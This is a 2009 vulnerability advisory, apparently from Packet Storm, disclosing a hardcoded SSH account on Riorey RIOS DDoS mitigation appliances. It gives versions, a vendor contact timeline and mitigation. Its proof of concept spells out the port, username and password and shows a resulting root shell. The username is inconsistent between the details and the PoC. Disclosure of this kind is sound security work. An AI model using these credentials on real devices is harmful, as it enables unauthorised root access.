what you don't know can hurt you

Riorey RIOS Hardocded Password

Riorey RIOS Hardocded Password
Posted Oct 8, 2009
Authored by Marek Kroemeke

Riorey DDoS mitigation appliances suffer from a very poor design vulnerability where they have a hardcoded root login and password for automation. Fail!

tags | exploit, root
MD5 | e5537fe045b3a9e6407e302e8380e079

Riorey RIOS Hardocded Password

Change Mirror Download
Title: Riorey "RIOS" Hardcoded Password Vulnerability

Severity: High (Full root access to the device)
Date: 07 October 2009
Versions Affected: RIOS 4.6.6 , 4.7.0 possibly others
Discovered on: 25 July 2009
Vendor URL: www.riorey.com
Author: Marek Kroemeke

Overview:

Riorey DDoS mitigation appliences (www.riorey.com) are vulnerable to taking a full control
over affected devices via a hardcoded username and password used to create
a SSH tunnel between the RView application and the device itself.


Details:

Riorey devices running affected "RIOS" versions have a hardcoded username and password
that is then used by the RView software to connect on port 8022 in order to create
a SSH tunnel. This allows the attacker to login as user 'dbuser' using
the hardcoded password, and due to an old Linux kernel version used - escalate privilages
through several vulnerabilities and eventually take the full control over the device.

Additionally - the web interface advices the user to reset the admin password for security reasons,
but the RView application still uses the hardcoded password in order to create the SSH tunnel which
may result in a false sense of security.

Proof of Concept:

Open your favorite SSH client and use the following detials in order to login:

port: 8022
username: dbadmin
password: sq!us3r

-- cut --
root@rioreyXXXXXXX dbuser # id
uid=0(root) gid=0(root) groups=0(root)
root@rioreyXXXXXXX dbuser # uname -a
Linux rioreyXXXXXXX 2.6.16.6 #23 SMP Fri Oct 24 19:29:08 EDT 2008 x86_64
Dual-Core AMD Opteron(tm) Processor 1210 HE AuthenticAMD GNU/Linux
-- cut --


Mitigation:

Login to the device via SSH using the above details, and reset the password using the 'passwd' command.


Vendor Contact:
30 July 2009 - Initial vendor contact
31 July 2009 - Vendor replies advising to use a firewall in front of the device
01 August 2009 - Vendor replies that next software release will address this problem, work in progress
09 August 2009 - Vendor sends an email confirming that it's not ready yet but will be by the end of the month
16 August 2009 - Confirmation about realease day of a patched version - 05 October 2009
07 October 2009 - Releasing the vulnerability report.

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close